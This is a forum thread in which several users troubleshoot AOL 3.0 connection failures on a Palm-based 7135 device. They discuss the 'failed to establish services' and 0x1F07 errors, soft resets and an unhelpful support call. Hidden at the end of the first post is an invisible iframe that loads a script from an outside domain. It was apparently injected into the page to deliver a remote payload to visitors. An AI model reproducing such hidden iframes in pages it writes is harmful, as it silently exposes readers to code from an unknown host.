+ Reply to Thread

Problems connecting to AOL 3.0

All of a sudden my connection to AOL on my 7135 fails with a "failed to establish services" error message. I tried removing the application and reinstalling it but still get the same error message. This has been going on for days now.

Has anyone else been experiencing this problem? I'm using version 3.0 and looking for a possible solution.

Thanks in advance!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Problems connecting to AOL 3.0

Originally posted by VZ Jeff
    All of a sudden my connection to AOL on my 7135 fails with a "failed to establish services" error message. I tried removing the application and reinstalling it but still get the same error message. This has been going on for days now.

Has anyone else been experiencing this problem? I'm using version 3.0 and looking for a possible solution.

Thanks in advance!
    I still get this problem occasionally. About once a week or so. I do a soft reset and it works the next time. Same thing if I get "DNS address not configured" or something like that.

I still get this problem occasionally. About once a week or so. I do a soft reset and it works the next time. Same thing if I get "DNS address not configured" or something like that.

I tried doing a soft reset and connection still fails.
    Seems I can't use the program at all anymore.

Sudden AOL problems too

I get this error all of a sudden:

Error: (ox1F07)

Under service connection progress. This happens in EN and QNC... anyone have an idea what's going on? Soft reset doesn't help..
    thanks

I contacted AOL Technical Support for Palm OS and they could not figure out what's causing my connectiion problems. I referred to my error message "failed to establish services" under service connection progress. Tech Support was clueless. Perhaps you'll have better luck with your error? You can reach them at 1-866-265-4732.

Next step is to request a refund if this is not resolved.